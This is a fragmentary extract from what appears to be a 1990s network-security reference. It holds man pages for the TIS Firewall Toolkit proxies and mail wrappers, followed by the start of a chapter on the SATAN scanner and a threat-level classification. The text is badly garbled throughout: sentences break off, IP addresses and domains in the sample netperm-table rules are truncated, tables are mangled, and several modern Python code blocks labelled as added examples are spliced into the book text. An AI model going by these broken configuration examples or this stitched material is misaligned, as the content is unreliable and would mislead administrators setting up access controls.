331-(----GATEWAY CONNECTED TO someplace----)
331-(220 someplace FTP server (Version 5...)
331 Password required for user.
...
Remote system type is Unix.
...
ftp> quit
221 Goodbye.

... This is useful in supporting modified ftp clients that “understand” the proxy. ... If this option is provided, ftp-gw will treat the session as if it has been authenticated for the specified user. ... The version of ftpd used should only pass this parameter when the user has been adequately authenticated. ...

ftp-gw reads its configuration rules and permissions information from the firewall configuration table netperm-table, and retrieves all rules specified for “ftp-gw”. ... If this value is specified, ftp-gw will set its user-id before providing service. ...

To specify a directory to which ftp-gw will chroot(2) prior to providing service, use the command:

directory pathname

The name of a file to display to the remote user if he or she is denied permission to use the proxy is entered with the command:

denial-msg filename

If this option is not set, a default message is generated. ...


To specify the name of a file to display as a welcome banner upon successful connection, use the command:

welcome-msg filename

If this option is not set, a default message is generated. ... To specify the file to use if help is issued, use the command:

help-msg filename

If this option is not set, a list of the internal commands is printed. ...

The following command specifies the idle timeout value in seconds:

timeout seconds

When the specified number of seconds elapses with no activity through the proxy server, it will disconnect. ...

The following rules specify host and access permissions:

hosts host-pattern [host-pattern2 ...]
...33...* 192...214...

Optional parameters permit the selective enabling or disabling of logging information. ...

- -nooutput ... Specifies that no matter what, the proxy should not accept input over a PORT. ... Attempts to do so result in the port being closed. ...
- -log ... Specifies that a log entry to the system log should be made whenever the listed operations are performed through the proxy. ... The format is as follows:
  -log operation
  -log { operation1 operation2 ... }
- -auth ... Specifies that the proxy should permit no operation (other than the quit command) until the user has authenticated to the server. ...
- -dest ... The format is as follows:
  -dest pattern
  -dest { pattern1 pattern2 ... }
  Specifies a list of valid destinations. ... The -dest list is processed in the order it appears on the options line. ... The following rule permits hosts that are not in the domain “mit... mit...
- -deny ... Specifies a list of FTP operations to deny. ... The format is as follows:
  -deny operation
  -deny { operation1 operation2 ... }

For authentication, the proxy recognizes the following options:

authorize username
auth username (shorthand form)
response password
resp password (shorthand form)

If the proxy requires authentication, attempts to use the service requested will not be permitted. ...

220 gatekeeper FTP proxy (Version 1...


Name (host:user): user@somplace
500 command requires user authentication
Login failed. ... 60/mjr) ready ...

Password:

Unfortunately, whenever the quote command is used passwords are visible. ...

Installation

To install ftp-gw, place the executable in a system area, then modify /etc/inetd.conf. ... The TCP service port on which to install the FTP proxy will depend on local site configuration. ... If the firewall doubles as an anonymous FTP archive, the proxy should be installed at another port. ... Most BSD Unix versions of the FTP client do, but some PC or Macintosh versions do not. ... conf has been modified, restart or reload inetd. ...

Typical configuration of the proxy in a firewall setup includes the use of rules, which block all systems that are not in the DNS from using the proxy, but permit all systems on the internal protected network to use the proxy. ...33...*
192...214...
This
program allows Gopher and Gopher+ clients to access Gopher, Gopher+, and FTP servers
...
Both standard and proxy-aware WWW clients are supported
...
Except where noted, client means Gopher,
Gopher+, WWW, or proxy aware WWW clients; server means Gopher, Gopher+, HTTP, or
FTP servers
...
Non-proxy-aware clients should be
set up so that their HOME PAGE is the proxy
...

• WWW (URLs)
...

• Gopher
...


Options
• -d file
...
It
allows debugging information to be written to the specified file
...
This option turns on the debugging log if specified
...


Operation
http-gw is invoked from inetd(8); it reads its configuration and checks to see if the system that
has just connected is permitted to use the proxy
...
If the peer is permitted to use the proxy, http-gw reads in a single line request
which it then decodes
...
Most requests carry the
information that the proxy needs in the first line
...
The client then connects to the host on the port and sends the selector
...
The proxy has to determine the host
and port from information contained in the selector
...
Both Gopher and WWW clients do none or only minimal processing on the selector
...

The proxy has to process three types of information:
• Gopher menus
...
The first character of the description tells the client the type of information
the entry refers to
...
Contains hypertext that can contain embedded links to other documents
...

• Other data files
...
The proxy passes the data
through without changing it
...
This is also the form of selector that is used in HTML
documents
...
The following table lists gopher types
and their related extensions
...
gif

DOS archives

5


...
zoo
...
arc
...
exe
...
dll
...
sys

Misc Images

I


...
jpeg
...
pct
...
tif
...
tar
...
gz

MAC archives

4


...
au
...
wav

HTML Documents

h


...
htm

Misc Documents

9


...
wri

Directories

1

Filenames that end in /

Plain text

0

All other extensions

Configuration
http-gw reads its configuration rules and permissions information from the firewall configuration table netperm-table, retrieving all rules specified for “http-gw” and “ftp-gw
...
The following configuration rules are recognized:
userid user

Specifies a numeric user-id or the name of a password file entry
...
Note that this option is included mostly for
completeness; HTTP-GW performs no local operations likely to introduce a security hole
...

timeout seconds

The preceding value is used as a dead-watch timer when the proxy is reading data from the net
...

default-gopher server

The default-gopher option specifies a Gopher server that receives handed off requests
...

ftp-proxy server

The ftp-proxy server option defines an ftp-gw that should be used to access FTP servers
...
Because the ftp-gw rules will be used if there are no relevant http-gw rules, this is not a major problem
...
] [options]
deny-hosts host-pattern [host-pattern
...
Typically, a hosts rule will be in the
form of:
http-gw: deny-hosts unknown
http-gw: hosts 192
...
112
...
94
...
*

Several host patterns may follow the “hosts” keyword, ending with the first optional parameter
beginning with “-”
...

permit-hosts options

The permit-hosts rule can use options
...
The functions are
defined later (see “Gopher Functions”)
...
] }

The -permit option permits only the specified functions
...
If this
option is not specified then all functions are initially permitted
...
] }

The -deny option specifies a list of Gopher/HTTP functions to deny
...

-httpd server

The -httpd option makes server the default HTTP server for this transaction
...

-filter function
-filter { function [function
...
This
option does not stop the user from entering selectors that the client will execute locally, but
this option can be used to remove selectors from retrieved documents
...

-nooutput

The -nooutput option disables data write functions
...
] }

The -log option specifies that a log entry to the system log should be made whenever the listed
functions are performed through the proxy
...


-auth function
-auth { function [function
...

-dest pattern
-dest { pattern [pattern
...
If no list is specified, all destinations are
considered valid
...
-dest
entries preceded with a ‘!’ character are treated as negation entries
...
edu” to be connected
...
mit
...
For the deny options
the request is used
...

Function   Description

dir        Fetching Gopher menus
           Getting a directory listing via FTP
           Fetching an HTML document (this is being studied)

read       Fetching a file of any type
           HTML files are treated as read even though they are also of dir format

write      Putting a file of any type
           Needs plus because it is only available to Gopher+ and HTTP/1
...
(See
“Security
...
When the client wants to perform
certain actions, such as telnet, the client program often runs the telnet command to perform
the function
...
Gopher requests to do FTP operations cause the
server to run the FTP program
...

Most client programs only know how to display a small number of data types; they rely on
external viewers to handle the other data types
...


Installation
To install HTTP-GW place the executable in a system area, then modify /etc/inetd
...
The
TCP service port on which to install the Gopher/HTTP proxy depends on local site configuration
...
70 is the normal
Gopher port and 80 is the normal HTTP port
...
conf has been modified, restart or
reload inetd
...

Typical configuration of the proxy in a firewall situation involves rules to block all systems that
are not in the DNS from using the proxy, but to permit all systems on the internal protected
network to use the proxy, as in this example:
http-gw: deny-hosts unknown
http-gw: hosts 192
...
112
...
94
...
*

login-sh—Authenticating Login Shell
Synopsis
login-sh

(invoked from /bin/login)

Description
login-sh provides a simple interface to the authentication service for login by replacing the
user’s login shell with a “wrapper” that requires the user to authenticate first; the program then
executes the real login shell
...
The user’s actual login shell information is stored
in an external file
...
This is attractive because it
separates the authentication policy from the permissions granting policy (/bin/login)
...
” The following configuration rules are recognized:

authserver address port

This command specifies the network address and service port of the authentication server to
use
...
Empty lines and lines with a pound sign (#) as the first character are
discarded or treated as comments
...
The userid field matches the login name of the user
invoking login-sh from the /etc/passwd file
...
The third and remaining
fields are parameters to pass to the executable program, starting at parameter zero
...
When you use these command interpreters, make sure you define them with their
required form—typically a leading dash “-”
...
Systems that are using login-sh should have all programs
that permit users to change their login shells disabled, or should have the setuid bit stripped
...
A minimum of two parameters must exist for each login shell that is
defined
...


netacl—TCP Network Access Control
Synopsis
netacl servicename (invoked from inetd)

Description
netacl provides a degree of access control for TCP-based services invoked from inetd(8)
...
netacl then searches its permissions information (read from netperm-table ) to see
if the host initiating the connection is authorized
...
Acceptance or rejection of the service is logged
through the syslog facility
...


Options
netacl accepts one parameter: the name of the service it is to provide
...
If invoked with no parameters, the service is assumed to be
the program name, just in case an administrator needs to replace the executable of some
daemon with a copy of netacl
...
telnetd:
netacl in
...
Host permission rules are in the form:
netacl-in
...
telnet deny-hosts host1 host2 -options

Following the permit-hosts or deny-hosts clause is a list of host names or IP-addresses that can
contain wildcards
...
If the rule
is a deny-hosts rule, the program will log the denial of the service and exit
...
If no rule is explicitly
permitting or denying a service, the service is denied
...
Specifies a program to invoke to handle the service
...
An -exec option must be present in every
rule
...
userid is the numeric UID or the name from a login in /etc/passwd that is
used to invoke the program
...
Specifies a directory to which netacl should chroot(2) prior to
invoking the service program
...


Examples
In this example, the \ line wraps have been added to fit lines on the page
...

netacl-in
...
33
...
* -exec /usr/etc/in
...
ftpd: permit-hosts unknown -exec /bin/cat /usr/local/etc/noftp
...
ftpd: permit-hosts 192
...
112
...
ftpd
netacl-in
...
ftpd
is configured to accept all connections from systems that do not have a valid DNS name
(“unknown”) and to invoke cat to display a file when a connection is made
...
Hosts in the specified subnet are connected to the real FTP server in /usr/etc/in
...

Connections from other networks are connected to a version of the FTP server that is already
chrooted to the FTP area, effectively making all FTP activity “captive
...
conf as desired,
replacing entries for the servers that will be controlled via netacl
...
ftpd

After inetd
...
Verify installation by attempting a
connection and monitoring the system logs
...
When plug-gw is invoked from inetd, it
reads its configuration and checks to see if the system that has just connected is permitted to
use the proxy
...
If the peer is permitted to use the
proxy, plug-gw determines (based on its configuration) what host to connect to on the “other
side
...


Options
plug-gw reads its configuration rules and permissions information from the firewall configuration table netperm-table, and retrieves all rules specified for “plug-gw
...

If no timeout is specified, the default is to remain connected until one side or the other closes
its connection
...
When a connection is made, a match is searched
for on the port-id and calling host
...
If the calling port matches, then the host-pattern is
checked for a match, following the standard address matching rules employed by the firewall
...
Sub-options include:
• -plug-to host
...
This option is
mandatory
...
Indicates that a reserved port number should be used when connecting
...

• -port portid
...
The default port is the same as the port used
by the incoming connection
...
conf to install pluggw for whatever services will be plugboarded
...

plug-gw was designed to permit “tunneling” NNTP traffic through firewalls, but it can be used
for a variety of purposes such as permitting remote access to a single service on a single host
...
The USENET news software must
then be configured so that both the internal and external NNTP servers believe they are
exchanging news with the firewall machine
...
In this example
the interior news server host is “foo
...
org” (111
...
1
...
outside
...
22
...
22)
...
us
...
” On the bastion host, you place an entry for the NNTP service in inetd
...

The configuration entries in netperm-table are as follows:
plug-gw: timeout 60
plug-gw: port webster 111
...
1
...
LCS
...
EDU -port webster
plug-gw: port nntp 111
...
1
...
22
...
22 -port nntp
plug-gw: port nntp 222
...
2
...
11
...
11 -port nntp

Whenever 111
...
1
...
22
...
22’s nntp service
...
11
...
11 should be configured to believe
that its news server is the bastion host “bastion
...
org”—the host from which it transfers and
receives news
...
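An added example, not plug-gw's own code, of the relay a plugboard performs once the rule lookup above has chosen the host on the other side: bytes are copied in both directions until one side closes, or until the configured timeout passes with nothing moving. The plug() and demo() functions, the socketpair() stand-ins for the two TCP connections and the NNTP lines are assumptions constructed for this example.

```python
"""Added example, not Firewall Toolkit code: the data-copying core of a
plug-gw style plugboard.  After the port/host rule has selected the
"other side", the proxy relays bytes both ways, stays connected until one
side closes and, when a timeout is configured, gives up after that many
idle seconds.  socketpair() replaces the real inbound and -plug-to
connections so the demo runs offline."""
import select
import socket
import threading


def plug(client, server, timeout=None, bufsize=4096):
    """Copy data between two connected sockets until one side closes or the
    link is idle for `timeout` seconds.  Returns "closed" or "timeout"."""
    peers = {client: server, server: client}
    reason = "closed"
    while True:
        readable, _, _ = select.select([client, server], [], [], timeout)
        if not readable:                       # nothing moved for `timeout` seconds
            reason = "timeout"
            break
        eof = False
        for sock in readable:
            data = sock.recv(bufsize)
            if not data:                       # that side closed its connection
                eof = True
                break
            peers[sock].sendall(data)          # forward to the other side
        if eof:
            break
    for sock in (client, server):              # tear down both halves together
        try:
            sock.shutdown(socket.SHUT_RDWR)
        except OSError:
            pass
        sock.close()
    return reason


def demo(timeout):
    """Constructed exchange through the plug.  With timeout=None the inside
    client hangs up; otherwise the link is left idle until the timeout fires."""
    inside, plug_in = socket.socketpair()      # stands in for the inbound connection
    plug_out, outside = socket.socketpair()    # stands in for the -plug-to connection
    result = {}
    worker = threading.Thread(
        target=lambda: result.update(reason=plug(plug_in, plug_out, timeout)))
    worker.start()
    inside.sendall(b"GROUP comp.security.misc\r\n")        # constructed NNTP command
    result["outward"] = outside.recv(4096)                  # seen on the other side
    outside.sendall(b"211 0 0 0 comp.security.misc\r\n")   # constructed NNTP reply
    result["inward"] = inside.recv(4096)                    # relayed back inside
    if timeout is None:
        inside.close()                         # client hangs up; plug sees EOF
    worker.join(10)
    result["finished"] = not worker.is_alive()
    inside.close()
    outside.close()
    return result
```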


Bugs
Because incoming connection hosts can be wildcarded, plug-gw works well in a many-to-one
relationship but does not work at all in a one-to-many relationship
...
Unfortunately, the software will have to be modified if
multiple instances of plug-gw are on the same port, or the internal news server’s software
cannot support connecting on a non-standard port
...
When
rlogin-gw is invoked from inetd, it reads its configuration and checks to see if the system that
has just connected is permitted to use the proxy
...
If the peer is permitted to use the proxy, rlogin-gw checks the username
that is provided as part of the rlogin protocol, and if it is in the form user@host, an attempt is
made to reconnect to the host and log in as that user
...
” The following
configuration rules are recognized:
directory pathname

This rule specifies a directory to which rlogin-gw will chroot(2) prior to providing service
...

timeout seconds

The timeout rule specifies the time, in seconds, the system remains idle before disconnecting
the proxy
...

denial-msg filename

The denial-msg rule specifies the name of a file to display to the remote user if he or she is
denied permission to use the proxy
...

help-msg filename

The help-msg rule specifies the name of a file to display if the “help” command is issued
...

denydest-msg filename

The denydest-msg rule specifies the name of a file to display if a user attempts to connect to a
remote server for which he or she is restricted
...

authserver hostname [portnumber [cipherkey] ]

The authserver rule specifies the name or address of a system to use for network authentication
...
If the server
supports DES-encryption of traffic, an optional cipherkey can be provided to secure communications with the server
...
] [ options]

The hosts rules specify host and access permissions
...
33
...
* 192
...
214
...
Optional parameters are:
-dest pattern
-dest pattern1 pattern2
...
If no list is specified, all destinations are
considered valid
...
-dest
entries preceded with a “!” character are treated as negation entries
...
edu” to be connected
...
mit
...

-passok

The -passok option specifies that the proxy should permit users to change their passwords if
they are connected by the designated host
...


Installation
To install rlogin-gw place the executable in a system area, then modify inetd
...
The rlogin proxy must be installed on the rlogin port (port 513)
in order to function without requiring modified clients
...


smap—Sendmail Wrapper Client
Synopsis
smap

(invoked from inetd)

Description
The smap client implements a minimal version of SMTP, accepting messages from over the
network and writing them to disk for future delivery by smapd
...
This arrangement overcomes potential security risks
presented by privileged mailers running where they can be accessed from over a network
...
Each session’s mail is
recorded in a temporary file in its spool directory, with the SMTP envelope encoded in the
heading of the file
...
As a secondary means of signaling when a message is completely gathered, the mode of
the file, which is initially 644, is changed to 755
...


Options
smap takes no command-line options
...
The name can be either a
name from the password database, or a numeric user-ID
...

directory pathname

The directory option specifies the spool directory where smap should store incoming messages
...

maxbytes value

maxbytes specifies the maximum size of messages to gather, in bytes
...

maxrecip value

The maxrecip option specifies the maximum number of recipients allowed for any message
...


timeout value

This option specifies a timeout, after which smap should exit if it has not collected a message
...


Installation
To install smap, locate the spool directory where mail will be collected
...
Install
smap in /etc/inetd
...
conf you need to signal inetd to reload its configuration information; you also need to make sure that sendmail is no longer running on the system
...
Usually, the best
recommendation is to build smap so that it is completely standalone; that is, a statically-linked
executable that is linked to a resolver library that will not crash if it is unable to read /etc/
resolv
...
A small number of support files (/etc/hosts, /etc/resolv
...
Be
careful not to install any device files or executables in the spool directory
...


Note smap assumes that smapd will also be running on the system
...
local)

Description
The smapd daemon periodically scans the mail spool area maintained by smap and delivers any
messages that have been gathered and stored
...
If the mail cannot be delivered normally, smapd can be configured to store spooled
files to an area for later examination
...
All configuration rules in netperm-table for
application “smapd” are read, and the following clauses and parameters are recognized:
executable pathname

The executable option specifies the pathname of the smapd executable itself
...

This entry is mandatory
...
smapd
assumes the use of sendmail but does not require it
...
]

The reason for this requirement is the exit code from the mailer is used to determine the status
of delivery
...

baddir pathname

The baddir option specifies a directory where smapd should move any spooled mail that
cannot be delivered normally
...
The pathname specified should not contain a
trailing forward slash (/)
...
The name can be either
a name from the password database, or a numeric user-ID
...

directory pathname

The directory option specifies the spool directory in which smapd should search for files
...

wakeup value

wakeup specifies the number of seconds smapd should sleep between scans of the spool
directory
...


Installation
To install smapd configure the executable and directory options in netperm-table and add
them to /etc/rc
...
A sample netperm-table configuration for smap and smapd looks like
this:
# email wrapper control
smap, smapd:    userid 4
smap, smapd:    directory /mail/inspool
smapd:          executable /usr/local/etc/smapd
smap:           maxrecip 4000
smap:           maxbytes 1048576
smap:           timeout 3600

In this example, both smap and smapd are running with user-id #4 (uucp) in the spool
directory /mail/inspool
...
To do this, add something similar to the following line in the crontab file:
0,30 * * * * /usr/lib/sendmail -q > /dev/null 2>&1
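An added example, not smap's or smapd's own code, modelling the spool handshake described above: the envelope goes in the heading of a temporary file, the file stays at mode 644 while it is being gathered and is changed to 755 when the message is complete, smapd delivers only completed files, treats the mailer's exit code as the delivery status and moves failures to baddir. The spool file layout, the maxbytes/maxrecip checks and the deliver() hook are assumptions, and the sessions are constructed.

```python
"""Added example, not smap/smapd code: a model of the spool handshake.
smap writes each session to a temporary file in the spool directory with
the SMTP envelope in the file heading (mode 644 while gathering, 755 when
complete); smapd scans the spool, delivers completed files and parks the
ones the mailer rejects in baddir.  Layout and hooks are assumptions."""
import os
import stat
import tempfile

IN_PROGRESS, COMPLETE = 0o644, 0o755


class Rejected(Exception):
    pass                                       # a configured limit was exceeded


def gather(spool, sender, recipients, body_lines, maxbytes, maxrecip):
    """Write one SMTP session to the spool; returns the path or raises Rejected."""
    if len(recipients) > maxrecip:
        raise Rejected("maxrecip exceeded")
    fd, path = tempfile.mkstemp(prefix="sma", dir=spool)
    os.fchmod(fd, IN_PROGRESS)                 # not yet safe for smapd to pick up
    written = 0
    with os.fdopen(fd, "w") as f:
        f.write("FROM %s\n" % sender)          # envelope in the heading of the file
        for rcpt in recipients:
            f.write("RCPT %s\n" % rcpt)
        f.write("DATA\n")
        for line in body_lines:                # arrives incrementally from the network
            written += len(line) + 1
            if written > maxbytes:
                os.unlink(path)                # abandon the partial file
                raise Rejected("maxbytes exceeded")
            f.write(line + "\n")
    os.chmod(path, COMPLETE)                   # secondary "message complete" signal
    return path


def read_spool(path):
    """Split a completed spool file back into (sender, recipients, body lines)."""
    with open(path) as f:
        head, body = f.read().split("DATA\n", 1)
    lines = head.splitlines()
    return lines[0][5:], [line[5:] for line in lines[1:]], body.splitlines()


def scan(spool, baddir, deliver):
    """One smapd wakeup.  deliver(sender, rcpts, body) returns a mailer exit
    code; 0 means delivered, anything else parks the file in baddir."""
    delivered, parked, skipped = [], [], []
    for name in sorted(os.listdir(spool)):
        path = os.path.join(spool, name)
        if stat.S_IMODE(os.stat(path).st_mode) != COMPLETE:
            skipped.append(name)               # smap is still gathering this one
            continue
        sender, rcpts, body = read_spool(path)
        if deliver(sender, rcpts, body) == 0:
            os.unlink(path)
            delivered.append(name)
        else:
            os.rename(path, os.path.join(baddir, name))
            parked.append(name)
    return delivered, parked, skipped


def demo():
    """Constructed run: one deliverable session, one bounce, one oversize
    session, and one stale partial file left by an interrupted session."""
    root = tempfile.mkdtemp()
    spool, baddir = os.path.join(root, "inspool"), os.path.join(root, "bad")
    os.mkdir(spool)
    os.mkdir(baddir)
    good = gather(spool, "alice@example.com", ["bob@example.net"],
                  ["Subject: hello", "", "body"], maxbytes=1048576, maxrecip=4000)
    bad = gather(spool, "eve@example.com", ["x@nowhere.invalid"],
                 ["Subject: bounce"], maxbytes=1048576, maxrecip=4000)
    try:
        gather(spool, "big@example.com", ["bob@example.net"], ["x" * 10],
               maxbytes=8, maxrecip=4000)
        rejected = False
    except Rejected:
        rejected = True
    fd, stale = tempfile.mkstemp(prefix="sma", dir=spool)   # interrupted session
    os.fchmod(fd, IN_PROGRESS)
    os.close(fd)

    def deliver(sender, rcpts, body):          # stand-in for the real mailer
        return 0 if all(r.endswith("@example.net") for r in rcpts) else 1

    delivered, parked, skipped = scan(spool, baddir, deliver)
    return {
        "rejected": rejected,
        "delivered": delivered == [os.path.basename(good)],
        "parked": parked == [os.path.basename(bad)]
                  and os.path.exists(os.path.join(baddir, os.path.basename(bad))),
        "skipped": skipped == [os.path.basename(stale)],
    }
```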

tn-gw—telnet Proxy Server
Synopsis
tn-gw [invoked from inetd]

Description
tn-gw provides pass-through telnet proxy services with logging and access control
...
If not, tn-gw shuts down the connection, displays a
message, and logs the connection
...

sol-> telnet otter
Trying 192
...
112
...

Connected to otter
...

otter telnet proxy (Version V1
...
09
...

sol->

Because of limitations in some telnet clients, options negotiation may possibly fail; such an
event will cause characters not to echo when typed to the tn-gw command interpreter
...
The default
display (without the argument) is the connecting hostname followed by port number 0
...


Options
tn-gw reads its configuration rules and permissions information from the firewall configuration
table netperm-table, where it retrieves the rules specified for “tn-gw
...
If this value is
specified, tn-gw will set its user-id before providing service
...

directory pathname

directory specifies a directory to which tn-gw will chroot(2) prior to providing service
...

denial-msg filename

denial-msg specifies the name of a file to display to the remote user if he or she is denied
permission to use the proxy
...

timeout seconds

The timeout option specifies the number of seconds the system should remain idle before it
disconnects the proxy
...

welcome-msg filename

welcome specifies the name of a file to display as a welcome banner after a successful connection
...

help-msg filename

The help option specifies the name of a file to display if the “help” command is issued
...

denydest-msg filename

The denydest-msg option specifies the name of a file to display if a user attempts to connect to
a restricted remote server
...

authserver hostname [portnumber [cipherkey]]

The authserver option specifies the name or address of a system to use for network authentication
...
If the server
supports DES-encryption of traffic, an optional cipherkey can be provided to secure communications with the server
...
] [ options]

The hosts rules specify host and access permissions
...
33
...
* 192
...
214
...
Optional parameters include:
-dest pattern
-dest pattern1 pattern2
...
If no list is specified, all destinations are considered
valid
...
-dest entries
preceded with a “!” character are treated as negation entries
...
edu” to be connected
...
mit
...

-passok

The -passok option specifies that the proxy should permit users to change their passwords if
they are connected by the designated host
...
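As an added example, not code from the Firewall Toolkit, the following evaluates netperm-table host rules the way the hosts, permit-hosts, deny-hosts and -dest descriptions for ftp-gw, http-gw, netacl, rlogin-gw and tn-gw lay out: first matching rule wins, "unknown" matches callers without a valid DNS name, no match means denied, and -dest entries are walked in order with "!" as negation. The table, addresses and program path are constructed, and refusing a destination that matches no -dest entry is an assumption.

```python
"""Added example, not Firewall Toolkit code: evaluating netperm-table host rules.
Rules are tried in the order they appear; the first hosts / permit-hosts /
deny-hosts rule for the application whose pattern matches the caller decides,
"unknown" matches callers with no valid DNS name, and a caller matched by no
rule is denied.  Patterns end at the first token beginning with "-"."""
import fnmatch

# Constructed table: documentation addresses and a placeholder server path.
SAMPLE_TABLE = """\
# constructed example, not a real site configuration
tn-gw:          timeout 3600
tn-gw:          deny-hosts unknown
tn-gw:          hosts 192.0.2.* -dest !*.example.org -dest *
netacl-in.ftpd: permit-hosts unknown -exec /bin/cat /usr/local/etc/noftp
netacl-in.ftpd: permit-hosts 192.0.2.* -exec /path/to/real-ftpd
"""

HOST_KEYWORDS = ("hosts", "permit-hosts", "deny-hosts")


def parse_table(text):
    """Return [(applications, keyword, args)] for each "app[, app]: keyword args" line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # "#" starts a comment
        if not line or ":" not in line:
            continue
        apps, body = line.split(":", 1)
        tokens = body.split()
        rules.append(([a.strip() for a in apps.split(",")], tokens[0], tokens[1:]))
    return rules


def split_hosts_rule(args):
    """Patterns run up to the first token starting with "-"; each option then
    takes the tokens that follow it, either bare or inside a { ... } group."""
    patterns, options, i = [], [], 0
    while i < len(args) and not args[i].startswith("-"):
        patterns.append(args[i])
        i += 1
    while i < len(args):
        name, values = args[i], []
        i += 1
        if i < len(args) and args[i] == "{":
            i += 1
            while args[i] != "}":
                values.append(args[i])
                i += 1
            i += 1
        else:
            while i < len(args) and not args[i].startswith("-"):
                values.append(args[i])
                i += 1
        options.append((name, values))
    return patterns, options


def host_matches(pattern, addr, name):
    """name is None when the caller has no valid DNS name (the "unknown" case)."""
    if pattern == "unknown":
        return name is None
    if fnmatch.fnmatchcase(addr, pattern):
        return True
    return name is not None and fnmatch.fnmatchcase(name.lower(), pattern.lower())


def check_access(rules, app, addr, name=None):
    """(permitted, options) from the first matching host rule; no match means denied."""
    for apps, keyword, args in rules:
        if app not in apps or keyword not in HOST_KEYWORDS:
            continue
        patterns, options = split_hosts_rule(args)
        if any(host_matches(p, addr, name) for p in patterns):
            return keyword != "deny-hosts", options
    return False, []


def dest_allowed(options, destination):
    """Walk the -dest entries in order; a "!" entry is a negation.  No entries
    means every destination is valid; a destination matching no entry is
    refused (assumed from "a list of valid destinations")."""
    entries = [v for opt, values in options if opt == "-dest" for v in values]
    if not entries:
        return True
    for entry in entries:
        if fnmatch.fnmatchcase(destination.lower(), entry.lstrip("!").lower()):
            return not entry.startswith("!")
    return False


def exec_program(options):
    """The program (and arguments) a netacl -exec option names, or None."""
    return next((values for opt, values in options if opt == "-exec"), None)
```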


Installation
To install tn-gw place the executable in a system area, then modify inetd
...
The telnet proxy must be installed on the telnet port (port 23) to
function properly
...
In some installations this may
cause a dilemma
...
Another option is to permit rlogind to run with netacl protecting it so that only a small number of administrative machines
can even attempt to log in
...


x-gw—X Gateway Service
Synopsis
x-gw [display/hostname]

Description
x-gw provides a user-level X connection service under tn-gw and rlogin-gw access control
...
When the connection request arrives, x-gw pops up a window
on the user’s real display asking for confirmation before permitting the connection
...

To run X through the firewall, exceptions have to be made in router configuration rules to
permit direct connectivity to ports from 6000 to 6100 on internal systems
...

Each time an X client application on a remote system starts, a control connection window
pops up on the user’s screen asking for confirmation before permitting the connection
...
The child daemon cleans
up the buffered data and exits if a connection is closed by either end
...
33
...
194
...
tis
...

Escape character is ‘^]’
...
tis
...
3) ready:
tn-gw-> x
tn-gw-> exit
Disconnecting
...


A window pops up on the user’s screen showing the port number of the proxy to use, and acts
as the control window
...


Options
display/hostname

The display option specifies a destination display where the user wants applications to appear
...
0, if the
argument is not specified
...
0 port is also a default number if the user sets the display to a
host name
...
The location of x-gw is compiled into the components of the
firewall Toolkit in tn-gw and rlogin-gw, based on the netperm-table
...

—Dante Alighieri, Inferno
Some people think that open discussion of network
security problems is an invitation to disaster
...
The release of the
SATAN program in April 1995 created an uproar
with this group
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

430

Part II: Gaining Access and Securing the Gateway

SATAN, a Unix program that quickly checks for the presence of vulnerabilities on remote
systems, offers an easy way for the average user to quickly examine the network security of
computer systems
...
The interesting name, the uniqueness of one of the creators, and the
topic of Internet security certainly added to the publicity of SATAN; however, SATAN did
contribute materially to network security monitoring in other ways
...
First, the user interface consists of HTML pages that are used through a
Web browser such as Mosaic or Netscape
...
Second, although SATAN is available with
several security tests built in, the general structure of SATAN permits a user to easily add
additional probes
...
These three innovations made the release of SATAN a significant advance in
the field of network security programs
...
It takes the
view that the best way a system administrator can ensure the security of a system is by considering how an intruder would try to break into it
...

An analogy might clarify the importance of SATAN
...
If, one night, you forget to lock
one of your windows in your neighborhood, it may not matter
...
However, if a burglar tried to break into your house
on the night that a window was left open, it would certainly simplify his job
...
In the hands of a conscientious apartment
manager or policeman, such a tool would help to ensure the safety of the neighborhood
...

SATAN is that device for the Internet
...
These potential intruders do not have to be particularly bright, because SATAN is
easy to use
...
These
intruders do not even have to know about the existence of the systems, because network ranges
can be used for targets
...
However, because every intruder in the world can quickly identify vulnerable
hosts, it “raises the bar” of required security to new heights
...
However, for hosts directly on
the Internet, relying on the obscurity of open windows is no longer acceptable
...

Before describing the SATAN program in great detail, this chapter investigates the nature of
network attacks
...
Next, the exact
details on the security holes searched for by SATAN are studied, as well as other network
holes
...

The important message that SATAN brings is this: thinking like an intruder can help you to
improve the security of your systems
...
Although no designer consciously puts security holes into
software, tensions frequently exist between a software program’s ease of use, its functionality,
and its security
...
Add configuration errors (netgroup mistakes), user shortcuts (xhost +), and
organizational policy mistakes (NFS servers on the Internet) to these design flaws, and the
result is a catalog of vulnerabilities for a wily intruder to prey upon
...
Although this is a drastic solution, there is always a trade-off between offering functionality and introducing vulnerabilities
...
For example, permitting electronic
mail to cross from the Internet into your internal organizational network means that the
firewall must have a network daemon, such as sendmail, listening on the SMTP port (TCP/25)
and willing to enter into an SMTP protocol exchange with anyone on the Internet
...
Even though an Internet service, such as NCSA’s
httpd web server, may be considered quite secure today, new releases may introduce vulnerabilities
...
Administrators must be vigilant against
assuming the long-term security of any Internet service
...


The network protocols themselves can be made secure
...
A protocol and service is “secure enough” when it
has only ITL Class 0 vulnerabilities, as explained later in this chapter
...
Network daemons, such as sendmail or fingerd, can be made more
secure by vendors through code review and patching
...
Also, organizational
policies can be very difficult to enforce
...
rhosts files, it can be
difficult to enforce this rule
...

It is rare to find an organization that has complete control over its computer network
...
In a large organization, policies and IT groups can and should try to set
guidelines for systems, such as not permitting unrestricted NFS access, but the distributed
nature of networked systems makes this control uncertain
...
For example, 500
computers on the U
...
Department of Defense’s Milnet network were successfully attacked in
early 1995 because of a single unauthorized Internet gateway that accidentally offered a
vulnerability (Leopold, 1995)
...
An IT organization can use SATAN to gain such control
...
This has not been done previously and is introduced in this book as a suggestion for
vendors and organizations when prioritizing security problems
...
The lowest threat falls into ITL Class 0, and the greatest threat
falls into ITL Class 9
...
1 provides descriptions of each ITL Class
...


Table 8
...

ITL Class   Description

1           Local users can gain read access to files on the local system
...
3           Local users can gain write and/or execution access to root-owned files on the
            system
...
5           Remote users on the same network can gain write and/or execution access to
            non–root-owned files on the system or transmitted over the network
...
7           Remote users across a firewall can gain read access to files on the system or
            transmitted over the network
...
9           Remote users across a firewall can gain write and/or execution access to
            root-owned files on the system
It might be useful to classify the severity of the threat in order to allocate resources
proportional to that severity
...
It may not even be necessary to close the Class 1 holes, depending on the
importance of the data on the system
...
System administrators frequently have control over local users to an extent that
these problems are not exploited, at least not maliciously
...

Class 4 through 6 problems are much more serious, because non-electronic control over the
intruders is no longer simple
...
For systems directly connected to the Internet, these problems are
extremely serious
...

